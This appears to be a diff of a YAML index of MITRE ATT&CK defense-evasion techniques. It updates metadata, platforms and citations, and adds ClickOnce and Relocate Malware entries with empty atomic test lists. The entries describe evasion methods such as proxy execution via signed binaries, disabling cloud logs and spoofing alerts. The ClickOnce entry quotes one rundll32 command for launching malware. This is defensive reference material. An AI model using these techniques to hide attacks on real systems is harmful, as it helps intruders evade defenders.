       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1553:
     technique:
@@ -10299,11 +10445,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -10383,11 +10528,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:24:56.148Z'
       name: 'Signed Binary Proxy Execution: Regsvr32'
       description: |-
         Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -10452,12 +10596,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.010
     atomic_tests: []
   T1036.003:
     technique:
-      modified: '2023-09-14T21:12:48.411Z'
+      modified: '2024-09-12T19:30:45.065Z'
       name: 'Masquerading: Rename System Utilities'
       description: 'Adversaries may rename legitimate system utilities to try to evade
         security mechanisms concerning the usage of those utilities. Security monitoring
@@ -10506,8 +10649,8 @@ defense-evasion:
         external_id: T1036.003
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -10522,14 +10665,13 @@ defense-evasion:
         url: https://lolbas-project.github.io/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.003
     atomic_tests: []
   T1562.011:
     technique:
-      modified: '2023-04-12T22:46:33.995Z'
+      modified: '2024-10-16T20:12:44.962Z'
       name: Spoof Security Alerting
       description: |-
         Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -10541,7 +10683,7 @@ defense-evasion:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -10571,13 +10713,12 @@ defense-evasion:
         url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -10638,7 +10779,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1027.003:
@@ -10694,11 +10834,10 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -10722,11 +10861,10 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -10751,9 +10889,8 @@ defense-evasion:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -10833,7 +10970,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.009:
     technique:
@@ -10867,7 +11003,7 @@ defense-evasion:
       - source_name: LOLBAS Regasm
         url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
         description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:55:48.725Z'
       name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
       description: |-
         Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -10894,8 +11030,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.009
     atomic_tests: []
   T1553.004:
@@ -10990,48 +11124,24 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.004
     atomic_tests: []
   T1027.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
-      type: attack-pattern
-      created: '2020-03-16T15:30:57.711Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1027.004
-        url: https://attack.mitre.org/techniques/T1027/004
-      - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
-          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
-          campaign. Retrieved November 29, 2018.'
-        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
-        source_name: ClearSky MuddyWater Nov 2018
-      - source_name: TrendMicro WindowsAppMac
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
-        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
-          Info Stealer and Adware. Retrieved April 25, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-03T17:43:14.766Z'
       name: 'Obfuscated Files or Information: Compile After Delivery'
       description: |-
-        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
 
         Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor the execution file paths and command-line arguments
         for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
         suspicious behavior to reduce false positives from normal user and administrator
@@ -11040,9 +11150,14 @@ defense-evasion:
         and execution frameworks like Mono and determine if they have a legitimate
         purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
         should only be used in specific and limited cases, like for software development.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Creation'
@@ -11054,12 +11169,35 @@ defense-evasion:
       - Anti-virus
       - Binary Analysis
       - Static File Analysis
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Compiler software (either native to the system or delivered by the adversary)
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+      created: '2020-03-16T15:30:57.711Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/004
+        external_id: T1027.004
+      - source_name: ClearSky MuddyWater Nov 2018
+        description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+          campaign. Retrieved November 29, 2018.'
+        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+      - source_name: ATTACK IQ
+        description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+          (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+          Binaries. Retrieved July 15, 2024.'
+        url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+      - source_name: TrendMicro WindowsAppMac
+        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+          Info Stealer and Adware. Retrieved April 25, 2019.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1027.004
     atomic_tests: []
   T1564.007:
@@ -11107,7 +11245,7 @@ defense-evasion:
         url: https://github.com/decalage2/oletools
         description: decalage2. (2019, December 3). python-oletools. Retrieved September
           18, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T14:02:07.944Z'
       name: VBA Stomping
       description: |-
         Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -11133,12 +11271,10 @@ defense-evasion:
       x_mitre_system_requirements:
       - MS Office version specified in <code>_VBA_PROJECT</code> stream must match
         host
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -11228,7 +11364,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1127.001:
@@ -11286,12 +11421,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127.001
     atomic_tests: []
   T1656:
     technique:
-      modified: '2023-09-30T19:45:05.886Z'
+      modified: '2024-10-15T15:59:06.382Z'
       name: Impersonation
       description: "Adversaries may impersonate a trusted person or organization in
         order to persuade and trick a target into performing some action on their
@@ -11333,10 +11467,9 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -11360,18 +11493,30 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.005:
     technique:
-      modified: '2023-10-02T22:17:54.968Z'
+      modified: '2024-09-25T14:15:26.322Z'
       name: Modify Cloud Compute Configurations
-      description: |-
-        Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
-        For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
-        Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+      description: "Adversaries may modify settings that directly affect the size,
+        locations, and resources available to cloud compute infrastructure in order
+        to evade defenses. These settings may include service quotas, subscription
+        associations, tenant-wide policies, or other configurations that impact available
+        compute. Such modifications may allow adversaries to abuse the victim’s compute
+        resources to achieve their goals, potentially without affecting the execution
+        of running instances and/or revealing their activities to the victim.\n\nFor
+        example, cloud providers often limit customer usage of compute resources via
+        quotas. Customers may request adjustments to these quotas to support increased
+        computing needs, though these adjustments may require approval from the cloud
+        provider. Adversaries who compromise a cloud environment may similarly request
+        quota adjustments in order to support their activities, such as enabling additional
+        [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+        suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+        2023) Adversaries may also increase allowed resource usage by modifying any
+        tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+        Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+        where cloud resources can be deployed, such as enabling [Unused/Unsupported
+        Cloud Regions](https://attack.mitre.org/techniques/T1535). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -11385,7 +11530,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       type: attack-pattern
@@ -11397,20 +11542,11 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1578/005
         external_id: T1578.005
-      - source_name: Microsoft Subscription Hijacking 2022
-        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
-          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
-        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
       - source_name: Microsoft Cryptojacking 2023
         description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
           Understanding and defending against cloud compute resource abuse. Retrieved
           September 5, 2023.'
         url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
-      - source_name: Microsoft Peach Sandstorm 2023
-        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
-          password spray campaigns enable intelligence collection at high-value targets.
-          Retrieved September 18, 2023.
-        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
       - source_name: Microsoft Azure Policy
         description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
           Retrieved September 5, 2023.
@@ -11419,11 +11555,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.008:
     technique:
-      modified: '2024-04-12T21:13:56.431Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Impair Defenses: Disable Cloud Logs'
       description: |-
         An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -11432,6 +11567,7 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -11441,6 +11577,7 @@ defense-evasion:
       - Janantha Marasinghe
       - Matt Snyder, VMware
       - Joe Gumke, U.S. Bank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
         for: <code>StopLogging</code> and <code>DeleteTrail</code>.(Citation: Stopping
@@ -11452,13 +11589,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      - Office 365
-      x_mitre_version: '2.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'User Account: User Account Modification'
@@ -11503,9 +11640,6 @@ defense-evasion:
         url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.008
     atomic_tests: []
   T1564.003:
@@ -11588,18 +11722,140 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.003
     atomic_tests: []
+  T1127.002:
+    technique:
+      modified: '2024-10-17T18:50:41.474Z'
+      name: ClickOnce
+      description: |-
+        Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+        Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+        ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+        Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+        Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Wirapong Petshagun
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Metadata'
+      - 'Module: Module Load'
+      x_mitre_system_requirements:
+      - ".NET Framework"
+      type: attack-pattern
+      id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+      created: '2024-09-09T14:39:28.637Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1127/002
+        external_id: T1127.002
+      - source_name: LOLBAS /Dfsvc.exe
+        description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+      - source_name: Microsoft Learn ClickOnce
+        description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+          Retrieved September 9, 2024.
+        url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+      - source_name: SpectorOps Medium ClickOnce
+        description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+          (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+        url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+      - source_name: NetSPI ClickOnce
+        description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+          Love Story. Retrieved September 9, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+      - source_name: Burke/CISA ClickOnce Paper
+        description: William J. Burke IV. (n.d.). Appref-ms Abuse for  Code Execution
+          & C2. Retrieved September 9, 2024.
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+      - source_name: Burke/CISA ClickOnce BlackHat
+        description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+          IN: When .appref-ms abuse is operating as intended. Retrieved September
+          9, 2024.'
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1070.010:
+    technique:
+      modified: '2024-10-13T15:48:46.391Z'
+      name: Relocate Malware
+      description: |-
+        Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+        Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+        Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Matt Anderson, @‌nosecurething, Huntress
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+      created: '2024-05-31T11:07:57.406Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/010
+        external_id: T1070.010
+      - source_name: Latrodectus APR 2024
+        description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+          (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+          31, 2024.'
